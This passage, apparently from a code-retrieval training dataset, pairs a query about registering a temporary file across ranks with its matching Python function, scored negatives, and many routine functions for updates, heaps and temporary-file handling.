"def update_orderbook(self, existing_orderbook_obj, instrument, market_place, market_segment, market_capability, \\\n tick_size_list, round_lot, day_count, orderbook_name, tiering_level, orderbook_curr=None):\n logger.DLOG(\"Updating orderbook...\") \n clone_obj = existing_orderbook_obj.Clone()\n clone_obj.Instrument = instrument\n if orderbook_curr:\n clone_obj.Currency = orderbook_curr\n else:\n clone_obj.Currency = instrument.Currency()\n clone_obj.Quotation = instrument.Quotation()\n clone_obj.MarketPlace = market_place\n clone_obj.RoundLot = self.get_round_lot(instrument, round_lot)\n #clone_obj.PhysicalMarketSegment(market_segment)\n clone_obj.Name = orderbook_name\n clone_obj.QuoteFactor = 1\n clone_obj.TickSizeList = self.get_tick_size_list(tick_size_list, market_capability)\n if str(tiering_level):\n clone_obj.ExternalType = tiering_level\n clone_obj.ExternalId = orderbook_name\n\n try: \n existing_orderbook_obj.Apply(clone_obj)\n existing_orderbook_obj.Commit() \n \n #group_map = self.get_list_leaf(clone_obj,market_segment) \n #if group_map and clone_obj.GroupMaps().IndexOf(group_map) <0 :\n # clone_obj.GroupMaps().Add(group_map) \n # clone_obj.GroupMaps().Commit() \n \n logger.LOG(\"**Successfully** updated orderbook information: <%s> for instrument <%s>\"%(orderbook_name, instrument.Name()))\n except Exception as e:\n logger.ELOG('**Error** while updating OrderBook %s : %s'%(orderbook_name, e))",
"def _update(self, priority, key):\n i = self._index[key]\n item = self._heap[i]\n old_priority = item.priority\n item.priority = priority\n if priority < old_priority:\n self._sift_up(i)\n else:\n self._sift_down(i)",
"def update(self, paths):\n raise NotImplementedError",
"def do_update(self, line):\n args = shlex.split(line)\n size = len(args)\n db = models.storage.all()\n if size == 0:\n print(\"** class name missing **\")\n elif not args[0] in self.__names:\n print(\"** class doesn't exist **\")\n elif size == 1:\n print(\"** instance id missing **\")\n elif not (args[0] + \".\" + args[1]) in db:\n print(\"** no instance found **\")\n elif size == 2:\n print(\"** attribute name missing **\")\n elif size == 3:\n print(\"** value missing **\")\n else:\n new_dict = db[args[0] + \".\" + args[1]].to_dict()\n val = args[3]\n if self.is_int(val):\n val = int(val)\n elif self.is_float(val):\n val = float(val)\n new_dict[args[2]] = val\n obj = self.__names[args[0]](**new_dict)\n db[args[0] + \".\" + args[1]] = obj\n models.storage.save()",
"def __swap_kv(self, node1, node2):\r\n node1.key, node2.key = node2.key, node1.key\r\n node1.value, node2.value = node2.value, node1.value",
"def update(self, new_data):\n all_keys = [key for key in self.__dict__]\n keys = [key for key in new_data]\n for key in keys:\n if key in all_keys:\n setattr(self, key, new_data[key])\n else:\n return {\n \"message\": \"Error encountered when setting attributes.\",\n \"help\": \"Ensure all fields you're updating are valid.\"\n }\n self.save()",
"def update(self, other):\n # Check if any columns will remain with their original length. If so\n # also check if the lengths of the tables are the same.\n self._dirty = True\n nrows = other.number_of_rows()\n\n if (other._columns and\n set(self._columns) - set(other._columns) and\n other.number_of_rows() != self.number_of_rows()):\n\n raise ValueError('Can not add columns of length {}'\n ' to table of length {}'.format(\n other.number_of_rows(),\n self.number_of_rows()))\n\n for name, column in other._columns.items():\n self._set_column_column_nocheck(name, column, nrows)\n\n self.set_table_attributes(other.get_table_attributes())\n self.set_name(other.get_name())",
"def update(self, other):\n for filter, value in other.items():\n self.__setitem__(filter, value)",
"def update(self, f):\n\n for p in self.__mapper__.attrs:\n\n if p.key == 'oid':\n continue\n try:\n setattr(self, p.key, getattr(f, p.key))\n\n except AttributeError:\n # The dict() method copies data property values into the main dict,\n # and these don't have associated class properties.\n continue",
"def update(self, f):\n\n for p in self.__mapper__.attrs:\n\n if p.key == 'oid':\n continue\n try:\n setattr(self, p.key, getattr(f, p.key))\n\n except AttributeError:\n # The dict() method copies data property values into the main dict,\n # and these don't have associated class properties.\n continue",
"def partition_book(self):\n ...",
"def update(self, instance, validated_data):\n validated_data.pop(\"assignment\", None)\n return super().update(instance, validated_data)",
"def update(self):\n raise NotImplementedError",
"def update(self, xnew, ynew):\n # define old snapshots to be discarded\n xold, yold = self.Xw[:,0], self.Yw[:,0]\n # Update recent w snapshots\n self.Xw = np.column_stack((self.Xw[:,1:], xnew))\n self.Yw = np.column_stack((self.Yw[:,1:], ynew))\n \n # direct rank-2 update\n # define matrices\n U, V = np.column_stack((xold, xnew)), np.column_stack((yold, ynew))\n C = np.diag([-(self.weighting)**(self.w),1])\n # compute PkU matrix matrix product beforehand\n PkU = self.P.dot(U)\n # compute AkU matrix matrix product beforehand\n AkU = self.A.dot(U)\n # compute Gamma\n Gamma = np.linalg.inv(np.linalg.inv(C)+U.T.dot(PkU))\n # update A\n self.A += (V-AkU).dot(Gamma).dot(PkU.T)\n # update P\n self.P = (self.P - PkU.dot(Gamma).dot(PkU.T))/self.weighting\n # ensure P is SPD by taking its symmetric part\n self.P = (self.P + self.P.T)/2\n \n # time step + 1\n self.timestep += 1",
"def update(self, initial, follows):",
"def update(self, new_attrs):\n self.last_update = round(time())\n self.attrs.update(new_attrs)",
"def __swap(self, index1, index2):\n self.heap[index1], self.heap[index2] = self.heap[index2], self.heap[index1]"
] | [
"0.603172",
"0.5819609",
"0.5723665",
"0.56900966",
"0.5662162",
"0.5607183",
"0.55987877",
"0.5512243",
"0.54352087",
"0.53991395",
"0.53937256",
"0.53484046",
"0.532894",
"0.53233975",
"0.5312622",
"0.5310722",
"0.527429",
"0.52614987",
"0.52564377",
"0.5246442",
"0.5220056",
"0.5203469",
"0.51834726",
"0.5143626",
"0.5128264",
"0.5115398",
"0.50941867",
"0.5092263",
"0.5082386",
"0.5068741",
"0.50646913",
"0.5055322",
"0.5055322",
"0.50542766",
"0.5039511",
"0.5022707",
"0.5014317",
"0.4994743",
"0.4993426",
"0.49737975",
"0.49677244",
"0.49373418",
"0.49266034",
"0.49219212",
"0.49073514",
"0.4907322",
"0.49006927",
"0.49003878",
"0.4888662",
"0.48821643",
"0.48818284",
"0.48772162",
"0.4875862",
"0.48624182",
"0.48598674",
"0.48503727",
"0.48495156",
"0.4844537",
"0.48431885",
"0.48358876",
"0.48327196",
"0.48276392",
"0.48201805",
"0.48199844",
"0.48190245",
"0.48149672",
"0.48142973",
"0.48104843",
"0.4804357",
"0.4788147",
"0.477689",
"0.47703344",
"0.47573906",
"0.4755909",
"0.47468758",
"0.4742124",
"0.4734377",
"0.4726497",
"0.4721463",
"0.47157052",
"0.47149414",
"0.4714855",
"0.47143224",
"0.47141275",
"0.4713408",
"0.4712776",
"0.471252",
"0.47106874",
"0.47095585",
"0.4706916",
"0.4700393",
"0.46999758",
"0.46999758",
"0.4699656",
"0.46965623",
"0.46955204",
"0.46938384",
"0.46926263",
"0.46898735",
"0.46878222"
] | 0.5176845 | 23 |
Register a temporary file on this rank that has been created on another rank. | def _register_temporary_file(self):
_partition_file = self._subarray._partition_file
_partition_dir = self._subarray._partition_dir
if _partition_file not in _temporary_files:
fd, _lock_file = mkstemp(
prefix=_partition_file + "_", dir=_partition_dir
)
close(fd)
_temporary_files[_partition_file] = (
_partition_dir,
_lock_file,
set(),
)
else:
_, _lock_file, _ = _temporary_files[_partition_file]
return _lock_file | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def register_tmp_file(self, tmp_file: str):\n self.temp_files.add(pathlib.Path(tmp_file))",
"def set_temp_file(self):\n\n index = self.filename.rfind('/') + 1\n self.temp_filename = self.filename[:index] + \"tmp_\" + self.filename[index:]",
"def add_tempfile(self, filename, exists=True):\n tmp = os.path.abspath(filename)\n if exists and not os.path.exists(tmp):\n raise IOError(\"Temporary file does not exist: \" + tmp)\n self._tempfiles[-1].append(tmp)",
"def TemporaryFile(mode='w+b',bufsize=_1,suffix='',prefix='tmp',dir=None):\n\tpass",
"def _create_file(self, rel_path, text):\n # FIXME: There are better/more secure APIs for creating tmp file paths.\n file_path = self.filesystem.join(self._temp_dir, rel_path)\n self.filesystem.write_text_file(file_path, text)\n return file_path",
"def get_temp_file(self, delete: bool = False, close: bool = False):\n prefix = str(self._tmp_folder / f\"pysimt_{os.getpid()}\")\n t = tempfile.NamedTemporaryFile(\n mode='w', prefix=prefix, delete=delete)\n self.register_tmp_file(t.name)\n if close:\n t.close()\n return t",
"def test_write_file():\n with tempfile.NamedTemporaryFile(delete=False) as t:\n temp_fn = t.name\n try:\n z = XPIManager(temp_fn, mode='w')\n f, d = 'install.rdf', '注目のコレクション'.decode('utf-8')\n z.write(f, d)\n assert z.read(f) == d.encode('utf-8')\n finally:\n os.unlink(temp_fn)",
"def _tempfile(self):\n fd, path = tempfile.mkstemp(dir = os.path.join(self.root, \"temporary\"))\n try:\n return os.fdopen(fd, \"wb\"), path\n except:\n os.unlink(path)\n os.close(fd)\n raise",
"def _temp_file(self, val):\n fd, fn = tempfile.mkstemp()\n fp = os.fdopen(fd, \"wb\")\n if val:\n if not isinstance(val, bytes):\n fp.write(val.encode(\"utf-8\", \"surrogateescape\"))\n else:\n fp.write(val)\n fp.close()\n return fn",
"def _create_unique_file(self):\n with open(self.uniquefile, 'w') as f:\n f.write(self._uniquename)\n self._uniquefile_created = True\n self._extend_expiration_time()\n self._p(\"Unique file created: %s\" % self.uniquefile)",
"def test_create1(self):\n fname = TempfileManager.create_tempfile()\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.startswith('tmp'))",
"def test_add3(self):\n OUTPUT = open(tempdir + 'add3', 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n TempfileManager.add_tempfile(tempdir + 'add3')",
"def mktmp(self, src, ext='.py'):\n fname = temp_pyfile(src, ext)\n if not hasattr(self, 'tmps'):\n self.tmps=[]\n self.tmps.append(fname)\n self.fname = fname",
"def _tmpfile(self,filename=None):\n\t\tif self._tmpdir is None:\n\t\t\tself._tmpdir = TemporaryDirectory(prefix=\"jitcxde_\")\n\t\t\n\t\tif filename is None:\n\t\t\treturn self._tmpdir.name\n\t\telse:\n\t\t\treturn path.join(self._tmpdir.name, filename)",
"def _tempfile(filename):\n return tempfile.NamedTemporaryFile(mode='w',\n dir=os.path.dirname(filename),\n prefix=os.path.basename(filename),\n suffix=os.fsencode('.tmp'),\n delete=False)",
"def _tmpfile(*args, **kwargs):\n with NamedTemporaryFile(prefix='test_parser', suffix='.tmp', delete=False) as tmp:\n fpath = tmp.name\n fh = open(fpath, *args, **kwargs)\n file_handles.append(fh)\n return fh",
"def new_temp_file(prefix, suffix):\n f = tempfile.NamedTemporaryFile(prefix=prefix, suffix=suffix, delete=False)\n f.close()\n return f.name",
"def new_file(self, *args, **kwargs):\n super().new_file(*args, **kwargs)\n self.file = TemporaryUploadedFile(self.file_name, self.content_type, 0, self.charset, self.content_type_extra)",
"def make_temp_file():\n global TEST_DATA_PATH\n TEST_DATA_PATH = tempfile.mkstemp()",
"def create_temporary_file():\n f = NamedTemporaryFile(delete=False)\n return f.name",
"def _temp_path(self, uri_like):\n handle, filename = tempfile.mkstemp(suffix=uri_like.split(\"/\")[-1])\n os.close(handle)\n return filename",
"def make_temp_file():\n with tempfile.NamedTemporaryFile() as f:\n return f.name",
"def save_tmp_file(self, data):\n with open(self.tmp_file, 'wb') as f:\n f.write(data)",
"def makeFilePointer(self, key, tmppath):\n fp = open(tmppath, 'w')\n self.getFile(key, fp)\n fp.close()",
"def test_unable_to_create_tmp_file(self, mocker):\n mocker.patch(\n 'tempfile.NamedTemporaryFile', side_effect=IOError('Fail')\n )\n\n payload = dict(id=\"stub_id\", data={\"some\": \"data\"})\n resp = self.client.post(self.url, json=payload)\n\n assert resp.status_code == 500\n assert resp.get_json() == {\n 'status': 'Error',\n 'type': 'OSError',\n 'message': 'Error during TAR.GZ creation: Fail'\n }",
"def save_to_tmp(form):\n file = request.files.get('file')\n suffix = os.path.splitext(secure_filename(file.filename))[-1]\n tf = tempfile.NamedTemporaryFile(dir='/tmp', delete=False, suffix=suffix, prefix='lpm_tmp_')\n filepath = tf.name\n tf.close()\n file.save(filepath)\n form.tmpname.data = os.path.basename(filepath)\n return filepath",
"def _create_temp_batch_file(self):\n return tempfile.NamedTemporaryFile(delete=False)",
"def get_temp_file(self, prefix=template, suffix=\"\"):\n ret = NamedTemporaryFile(delete=False, prefix=prefix, suffix=suffix)\n self._tempfiles.append(ret)\n if is_win():\n ret.close()\n return ret",
"def test_create2(self):\n fname = TempfileManager.create_tempfile(prefix='foo')\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.startswith('foo'))",
"def test_write(self):\n temp_file = tempfile.mkstemp()[1]\n try:\n with open(temp_file, \"w+\") as fh:\n self.new_manifest.write(fh)\n tools.eq_(self.new_manifest, load_manifest(temp_file))\n finally:\n os.unlink(temp_file)",
"def _tmp(self):\n tmpfn = tempfile.NamedTemporaryFile(prefix='tmp',\n suffix='.out',\n delete=False)\n return tmpfn.name",
"def test_open_write(self, client, remote_temp_dir):\n\n file_path = posixpath.join(remote_temp_dir, \"test2.txt\")\n assert not client.exists(file_path)\n\n with HdfsHook() as hook:\n with hook.open(file_path, \"wb\") as file_:\n file_.write(b\"Test file\\n\")\n\n assert client.exists(file_path)",
"def _testfile():\r\n import tempfile\r\n return os.path.join(tempfile.gettempdir(), 'trash-%s' % os.getpid())",
"def newfile(self) :\n\n\t\tfrom tempfile import mkstemp\n\t\timport os\n\t\tglobal configurer\n\n\t\tfd,name = mkstemp(suffix='.blend')\n\t\tos.close(fd)\n\t\tself.name = name\n\t\tfd = open(name,'wb', configurer.get('ServerBufferSize'))\n\t\tself.fd = fd\n\t\tprint name\n\t\treturn 1",
"def temp_file_name(suffix):\n return 'tmp%s%s' % (uuid.uuid4(), suffix)",
"def tempfile_name():\n ret = os.path.join(tempfile.gettempdir(), 'system_monitor.log')\n if os.access(ret, os.F_OK) and not os.access(ret, os.W_OK):\n print(\"WARNING: Couldn't write to log file {0}: (Permission denied)\".format(ret))\n ret = tempfile.mkstemp(prefix='system_monitor', suffix='.tmp', text=True)\n print(\"Create a new log file: {0}\".format(ret[1]))\n return ret[1]\n\n return ret",
"def missing_but_potential_file():\r\n tempf = tempfile.NamedTemporaryFile()\r\n fname = tempf.name\r\n tempf.close()\r\n return fname",
"def test_add2(self):\n TempfileManager.add_tempfile(tempdir + 'add2', False)",
"def test_append_filehandle(self, tmp_path, mode):\n append_file = tmp_path / \"append.fits\"\n with append_file.open(mode) as handle:\n fits.append(filename=handle, data=np.ones((4, 4)))",
"def temp_file(suffix=\"\"):\n global _temp_dir\n warnings.warn(\n \"Please use the :mod:`tempfile` module from the standard library\",\n DeprecationWarning\n )\n _create_temp_dir()\n if suffix != \"\" and not suffix.startswith(\".\"):\n suffix = \".\" + suffix\n return tempfile.mktemp(suffix=suffix, dir=_temp_dir)",
"def save_torrent_file(filename, torrent_file, username):\n retVal = True\n try:\n with open(UPLOAD_HISTORY, 'a') as uh:\n uh.write(\"{filename}, {username}, {timestamp}\\n\".format(filename=filename, \n username=username, \n timestamp=datetime.datetime.now()))\n torrent_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n except:\n retVal = False\n return retVal",
"def writer(self, size=None):\n data_file = os.path.join(self.put_datadir, self._obj)\n\n # Assume the full directory path exists to the file already, and\n # construct the proper name for the temporary file.\n attempts = 1\n cur_thread = str(getcurrent())\n while True:\n postfix = md5(self._obj + _cur_host + _cur_pid + cur_thread\n + str(random.random())).hexdigest()\n tmpfile = '.' + self._obj + '.' + postfix\n tmppath = os.path.join(self.put_datadir, tmpfile)\n try:\n fd = do_open(tmppath,\n os.O_WRONLY | os.O_CREAT | os.O_EXCL | O_CLOEXEC)\n except GlusterFileSystemOSError as gerr:\n if gerr.errno == errno.ENOSPC:\n # Raise DiskFileNoSpace to be handled by upper layers\n raise DiskFileNoSpace()\n if gerr.errno not in (errno.ENOENT, errno.EEXIST, errno.EIO):\n # FIXME: Other cases we should handle?\n raise\n if attempts >= MAX_OPEN_ATTEMPTS:\n # We failed after N attempts to create the temporary\n # file.\n raise DiskFileError('DiskFile.mkstemp(): failed to'\n ' successfully create a temporary file'\n ' without running into a name conflict'\n ' after %d of %d attempts for: %s' % (\n attempts, MAX_OPEN_ATTEMPTS,\n data_file))\n if gerr.errno == errno.EEXIST:\n # Retry with a different random number.\n attempts += 1\n elif gerr.errno == errno.EIO:\n # FIXME: Possible FUSE issue or race condition, let's\n # sleep on it and retry the operation.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif not self._obj_path:\n # No directory hierarchy and the create failed telling us\n # the container or volume directory does not exist. This\n # could be a FUSE issue or some race condition, so let's\n # sleep a bit and retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif attempts > 1:\n # Got ENOENT after previously making the path. This could\n # also be a FUSE issue or some race condition, nap and\n # retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\" % gerr)\n attempts += 1\n else:\n # It looks like the path to the object does not already\n # exist; don't count this as an attempt, though, since\n # we perform the open() system call optimistically.\n self._create_dir_object(self._obj_path)\n else:\n break\n dw = None\n try:\n # Ensure it is properly owned before we make it available.\n do_fchown(fd, self.uid, self.gid)\n # NOTE: we do not perform the fallocate() call at all. We ignore\n # it completely.\n dw = DiskWriter(self, fd, tmppath, self.threadpool)\n yield dw\n finally:\n try:\n if dw.fd:\n do_close(dw.fd)\n except OSError:\n pass\n if dw.tmppath:\n do_unlink(dw.tmppath)",
"def register_model_file(self, filename):\n # TODO: remember about locking&reading when doing the atomic stuff\n self.model_files.append(filename)\n self.serialize()",
"def test_create1a(self):\n fname = TempfileManager.create_tempfile(dir=tempdir)\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.startswith('tmp'))",
"def makeTempFile(self,perms=0o600,keep=False):\n\n fd=os.open(self.temp,os.O_RDWR|os.O_CREAT|os.O_EXCL|os.O_TRUNC,perms)\n f=os.fdopen(fd,'w+') \n if not keep:\n atexit.register(os.remove,self.temp)\n return f",
"def creatercfiletemp(rcfile):\n f = open(rcfile, 'w')\n f.write(rcfile_template)\n f.close()",
"def atomic_open(name, *args, **kwargs):\n basename = os.path.basename(name) + '.tmp.' + uuid1().hex\n # Make sure the tmp file is hidden\n if not basename.startswith('.'):\n basename = '.' + basename\n tmpfile = os.path.join(os.path.dirname(name), basename)\n if os.path.exists(name):\n shutil.copyfile(name, tmpfile)\n with open(tmpfile, *args, **kwargs) as ofile:\n yield ofile\n os.rename(tmpfile, name)",
"def test_create3(self):\n fname = TempfileManager.create_tempfile(suffix='bar')\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertTrue(fname.endswith('bar'))",
"def tempfile():\n return mkstemp()[1]",
"def store(self, filename):",
"def tmpfile(tmpdir_factory):\n\n def make(filename):\n fn = tmpdir_factory.mktemp(\"data\").join(filename)\n return fn\n\n # fn = tmpdir_factory.mktemp(\"data\").join(filename)\n return make",
"def save_to_temp(obj, file_name, xml_file, node, hash_id, routine=\"temp_file\"):\n root = xml_file.getroot()\n try:\n output = root.find(\"saved_files\").attrib[\"path\"]\n except KeyError:\n output = None\n if output is not None:\n dir_name = output\n else:\n dir_name = os.path.dirname(file_name)\n parent_name = os.path.basename(dir_name)\n print(\"Saving \" + routine + \" to file\")\n print(\"Output folder: \" + dir_name)\n model_name = root.attrib['name']\n save_folder = \"/saved_files/\" + routine +\"-\"+model_name+ \"_\" +str(hash_id)+ \".bp\"\n\n filename = dir_name+save_folder\n\n relative_path=dir_name+save_folder\n if not os.path.isdir(dir_name+\"/saved_images\"):\n os.mkdir(dir_name+\"/saved_images\")\n for i in plt.get_fignums():\n if i not in saved_already:\n saved_already.append(i)\n Plotting.figure(i)\n save_image_folder = '/saved_images/'+routine+\"-\"+model_name+'-figure%d.png' % i\n Plotting.savefig(dir_name+save_image_folder)\n try:\n Utility.save(obj, filename)\n except IOError:\n os.mkdir(dir_name+\"/saved_files/\")\n Utility.save(obj, filename)\n node.set('path', relative_path)\n root = xml_file.getroot()\n indent(root)\n xml_file.write(file_name)",
"def renameTempGrab(self, url, tag):\n hsh = self.hashOfTempFile()\n ext = url.split(\".\")[-1]\n fname = \"%s.%s.%s.%s\" % (tag, self.timeCode(), hsh[:10], ext)\n if os.path.exists(\"temp.dat\"):\n self.log(\"renaming temp file to: \"+fname)\n os.rename(\"temp.dat\", \"data/\"+fname)\n return fname, hsh, ext",
"def test_create4(self):\n TempfileManager.sequential_files(2)\n fname = TempfileManager.create_tempfile()\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 1)\n fname = os.path.basename(fname)\n self.assertEqual(fname, 'tmp2')\n #\n TempfileManager.unique_files()\n fname = TempfileManager.create_tempfile()\n OUTPUT = open(fname, 'w')\n OUTPUT.write('tempfile\\n')\n OUTPUT.close()\n self.assertEqual(len(list(glob.glob(tempdir + '*'))), 2)\n fname = os.path.basename(fname)\n self.assertNotEqual(fname, 'tmp3')\n self.assertTrue(fname.startswith('tmp'))",
"def _temporary_resource_file(text, prefix='', suffix=''):\n import tempfile\n\n # Ensure the folder exists\n if not os.path.exists(_temp_path):\n os.mkdir(_temp_path)\n\n try:\n fd, temp_file_path = tempfile.mkstemp(prefix=prefix, suffix=suffix, dir=_temp_path)\n if persist.debug_mode():\n persist.printf(\"{}: created temporary file at {}\".format(p_name, temp_file_path))\n\n try:\n with open(fd, 'w', encoding='utf-8') as f:\n f.write(text)\n temp_file_resource_path = \"/\".join([\"Packages\", _temp_dir_name,\n os.path.basename(temp_file_path)])\n yield temp_file_resource_path\n finally:\n os.remove(temp_file_path)\n except FileNotFoundError:\n _remove_temp_path()\n finally:\n # And remove the folder, if it's empty.\n # Otherwise wait for a \"restart\".\n try:\n os.rmdir(_temp_path)\n except OSError as e:\n if persist.debug_mode():\n persist.printf(\"{}: unable to delete temporary folder; {}\".format(p_name, e))",
"def _get_temp_path(self):\n handle, path = tempfile.mkstemp()\n # windows can't write to a file that is already open by another process\n # (tests use pipe redirection to a log file)\n os.close(handle)\n return path",
"def tests_ti_file_create_2(self):\n metadata = {\n 'size': 84504,\n 'sha256': '33af46377c0e52ca19aea233b3afb64505b32fac2231ec7a8a6795812fae0d10',\n 'md5': 'a9ba66af82897dadb82e3e89c70ae7ac',\n 'sha1': '19d08af69fe15af22ba81f045e31230150d4bdad',\n }\n file_indicator = self.ti.file(**metadata)\n file_indicator.delete()\n\n assert file_indicator.data['sha1'] == metadata['sha1']\n response = file_indicator.create()\n assert response.ok\n unique_id = ':'.join([metadata[x] for x in ['sha256', 'sha1', 'md5']])\n file_indicator = self.ti.file(unique_id=unique_id, **metadata)\n\n assert file_indicator.data['sha256'] == metadata['sha256']\n assert file_indicator.data['sha1'] == metadata['sha1']\n\n response = file_indicator.update()\n assert response.ok\n file_indicator.delete()",
"def test_fileAlreadyExistsNoOverwrite(self):\n fp = FilePath(self.mktemp())\n fp.touch()\n\n self.assertRaises(OSError, self.makeConnectedDccFileReceive, fp.path)",
"def get_temporary_file_name(original_file):\n directory, basename = os.path.split(original_file)\n basename = basename[-MAX_TEMPORARY_FILE_BASENAME_LENGTH:]\n\n random_hex = binascii.b2a_hex(os.urandom(16)).decode('utf-8')\n new_file_path = os.path.join(directory, '%s%s' % (random_hex, basename))\n\n return new_file_path",
"def make_tempfile(content=None, prefix='rbtools.', suffix=None, filename=None):\n if filename is not None:\n tmpdir = make_tempdir()\n tmpfile = os.path.join(tmpdir, filename)\n\n with open(tmpfile, 'wb') as fp:\n if content:\n fp.write(content)\n else:\n with tempfile.NamedTemporaryFile(prefix=prefix,\n suffix=suffix or '',\n delete=False) as fp:\n tmpfile = fp.name\n\n if content:\n fp.write(content)\n\n tempfiles.append(tmpfile)\n\n return tmpfile",
"def test_monitor_correctly_uses_temporary_files(self, _, feed_pages):\n # Arrange\n client = create_autospec(spec=ProQuestAPIClient)\n client.download_all_feed_pages = MagicMock(\n return_value=list(map(fixtures.serialize, feed_pages))\n )\n\n client_factory = create_autospec(spec=ProQuestAPIClientFactory)\n client_factory.create = MagicMock(return_value=client)\n\n monitor = ProQuestOPDS2ImportMonitor(\n client_factory, self._db, self._proquest_collection, ProQuestOPDS2Importer\n )\n monitor.import_one_feed = MagicMock(return_value=([], []))\n\n results = {\"temp_directory\": None, \"temp_files\": []}\n original_mkdtemp = tempfile.mkdtemp\n original_named_temporary_file_constructor = tempfile.NamedTemporaryFile\n original_rmtree = shutil.rmtree\n original_parse_feed = core.opds2_import.parse_feed\n\n def create_temp_directory():\n results[\"temp_directory\"] = original_mkdtemp()\n\n return results[\"temp_directory\"]\n\n def create_temp_file(**kwargs):\n temp_file = original_named_temporary_file_constructor(**kwargs)\n results[\"temp_files\"].append(temp_file.name)\n\n return temp_file\n\n # Act\n with patch(\"tempfile.mkdtemp\") as mkdtemp_mock, patch(\n \"tempfile.NamedTemporaryFile\"\n ) as named_temporary_file_constructor_mock, patch(\n \"shutil.rmtree\"\n ) as rmtree_mock, patch(\n \"api.proquest.importer.parse_feed\"\n ) as parse_feed_mock:\n mkdtemp_mock.side_effect = create_temp_directory\n named_temporary_file_constructor_mock.side_effect = create_temp_file\n rmtree_mock.side_effect = original_rmtree\n parse_feed_mock.side_effect = original_parse_feed\n\n monitor.run_once(False)\n\n # Assert\n # Ensure that the temp directory was successfully created.\n tempfile.mkdtemp.assert_called_once()\n\n # Ensure that the number of created temp files is equal to the number of feed pages.\n tempfile.NamedTemporaryFile.assert_has_calls(\n [call(mode=\"r+\", dir=results[\"temp_directory\"], delete=False)]\n * len(feed_pages)\n )\n\n # Ensure that parse_feed method was called for each feed page.\n parse_feed_mock.assert_has_calls(\n [call(ANY, silent=False)] * len(feed_pages)\n )\n\n # Ensure that the temp directory was successfully removed.\n shutil.rmtree.assert_called_once_with(results[\"temp_directory\"])\n assert False == os.path.exists(results[\"temp_directory\"])",
"def temporary_image(self):\n\n image = Image.new('RGB', (1, 1))\n tmp_file = tempfile.NamedTemporaryFile(suffix='.jpg')\n image.save(tmp_file, 'jpeg')\n # important because after save(),\n # the fp is already at the end of the file\n tmp_file.seek(0) # retrieves the created temp file\n return tmp_file",
"def test_append_filename(self, home_is_temp):\n data = np.arange(6)\n testfile = self.temp(\"test_append_1.fits\")\n\n # Test case 1: creation of file\n fits.append(testfile, data=data, checksum=True)\n\n # Test case 2: append to existing file, with verify=True\n # Also test that additional keyword can be passed to fitsopen\n fits.append(testfile, data=data * 2, checksum=True, ignore_blank=True)\n\n # Test case 3: append to existing file, with verify=False\n fits.append(testfile, data=data * 3, checksum=True, verify=False)\n\n with fits.open(testfile, checksum=True) as hdu1:\n np.testing.assert_array_equal(hdu1[0].data, data)\n np.testing.assert_array_equal(hdu1[1].data, data * 2)\n np.testing.assert_array_equal(hdu1[2].data, data * 3)",
"def setup_output(self, filename=None):\n temp_file_descriptor = None\n if filename is None:\n temp_file_descriptor, filename = mkstemp()\n\n self.filename = filename\n self._temp_file_descriptor = temp_file_descriptor",
"def tempfile_factory(total_length, content_type, filename, file_length):\n # We do need the \"+\" in there for the tempfile module's sake.\n return tempfile.TemporaryFile(\"w+b\")",
"def safe_write_file(self, fn, text):\n fd, tmpfn = mkstemp(dir=self.temp_dir)\n with open(fd, 'wt') as f:\n f.write(text)\n # https://stackoverflow.com/a/2333979\n f.flush()\n os.fsync(f.fileno())\n os.rename(tmpfn, fn)",
"def move_from_temp_directory(self):",
"def register_captured_url_local(filename, url):\n with open(filename, 'a') as f:\n f.write(url + '\\n')",
"def create_file(self, name, content):\n self.files[name] = content",
"def test_add2_dir(self):\n TempfileManager.add_tempfile(tempdir + 'add2', False)",
"def temp_fs_proc(self, temp_fs_proc):\n\n self._temp_fs_proc = temp_fs_proc",
"def create_tempfile(self, suffix=None, prefix=None, text=False, dir=None):\n if suffix is None:\n suffix = ''\n if prefix is None:\n prefix = 'tmp'\n if dir is None:\n dir = self.tempdir\n if dir is None and pyutilib_mngr is not None:\n dir = pyutilib_mngr.tempdir\n if dir is not None:\n deprecation_warning(\n \"The use of the PyUtilib TempfileManager.tempdir \"\n \"to specify the default location for Pyomo \"\n \"temporary files has been deprecated. \"\n \"Please set TempfileManager.tempdir in \"\n \"pyomo.common.tempfiles\", version='5.7.2')\n\n ans = tempfile.mkstemp(suffix=suffix, prefix=prefix, text=text, dir=dir)\n ans = list(ans)\n fname = os.path.abspath(ans[1])\n os.close(ans[0])\n if self._tempfiles[-1].ctr >= 0:\n new_fname = os.path.join(\n os.path.dirname(fname),\n prefix + str(self._tempfiles[-1].ctr) + suffix\n )\n # Delete any file having the sequential name and then\n # rename\n if os.path.exists(new_fname):\n os.remove(new_fname)\n shutil.move(fname, new_fname)\n fname = new_fname\n self._tempfiles[-1].ctr += 1\n self._tempfiles[-1].append(fname)\n return fname",
"def test_add1(self):\n try:\n TempfileManager.add_tempfile(tempdir + 'add1')\n self.fail(\"Expected IOError because file 'add1' does not exist\")\n except IOError:\n pass",
